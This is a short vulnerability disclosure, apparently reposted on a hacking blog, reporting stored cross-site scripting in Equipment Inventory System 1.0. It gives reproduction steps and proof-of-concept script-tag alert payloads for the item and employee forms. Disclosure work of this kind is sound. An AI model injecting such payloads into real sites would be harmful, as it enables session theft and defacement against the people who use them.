Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86396709

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Equipment Inventory System 1.0 - 'multiple' Stored XSS
# Exploit Author: Jitendra Kumar Tripathi
# Vendor Homepage: https://www.sourcecodester.com/php/11327/equipment-inventory.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11327&title=Equipment+Inventory+System+using+PHP+with+Source+Code
# Version: 1
# Tested on Windows 10 + Xampp 8.0.3

Vulnerable Parameters: Item List , Employee Details , Position of Employee

*Steps to reproduce:*
1: Log in with a valid username and password. 

2: Navigate to http://localhost/deped/admin/item.php
   Add Item 
   Payload : <script>alert(1)</script>

   Navigate to http://localhost/deped/admin/employee.php
   Add Employee
   Payload : <script>alert(2)</script>
   
   Post Saved Sucessfully , reload your page or navigate to any page you will see these XSS triggered.